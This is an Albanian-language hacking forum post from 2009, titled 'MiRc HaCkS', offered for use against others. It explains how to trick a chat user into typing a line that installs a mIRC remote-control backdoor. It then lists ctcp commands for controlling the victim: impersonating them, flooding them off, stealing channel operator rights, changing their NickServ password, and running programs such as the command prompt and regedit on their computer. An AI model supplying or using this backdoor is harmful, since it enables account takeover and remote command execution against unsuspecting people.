AlbStyle.Tk

By BeSi
 
ForumForum  PortaliPortali  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 MiRc HaCkS

Shko poshtë 
AutoriMesazh
BeSi
Admin
avatar

Numri i postimeve : 135
Join date : 21/04/2009
Age : 28
Location : Albania/Tropoje

MesazhTitulli: MiRc HaCkS   Fri Apr 24, 2009 12:30 am

.//write neo.pas ctcp 1:*$1- | Load -rs neo.pas kete Komanden jipjani tjetrit po mos e provoni vet ta shkruj ai ne Server dhe ai person qe e shkrun kete Komand eshte ne kontrolin tuaj.

a)Per ta futur Viktimen ne nje Kanal : /ctcp nick /j #kanal

b)Per ta rrexuar nga Floodet : /ctcp NICK /timer1 0 0 /ping $me

c)Per te Derguar mesazh ne Kanal me emrin e Viktimes : /ctcp nick /msg #kanal mesazhi

d)Per te derguar mesazh privat me emrin e Viktimes : /ctcp nick /msg nick(shkrimi qe do shkruni) mesazh

e)Per ta hequr nga KanaLi Viktimen : /ctcp nick /part #kanal

f)Per tja mbyllur programin e Chatit : /ctcp nick /exit

g)Per tja Nderruar Passwordin e Nickut : /ctcp nick /msg nickserv set passwd passiri

h)per tia Ndrruar Nickun : /ctcp NICK /nick Nickuri

i)Per tu bere Op ne KanaLin qe ka access Viktima: /ctcp NICK /mode #kanal +o NickuJuaj

j)Per tja Futur ne Pune Viktimes msdos'in : /ctcp nick /run command

k)Per tja Hapur viktimes nje mIRc tjeter : /ctcp Nick /run mirc

l)Per tja hapur Regedit'in Viktimes : /ctcp NICK /run rege
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://wWw.AlbStyle.Tk
 
MiRc HaCkS
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
AlbStyle.Tk  :: Argetim :: Arkiva :: Hacking-
Kërce tek: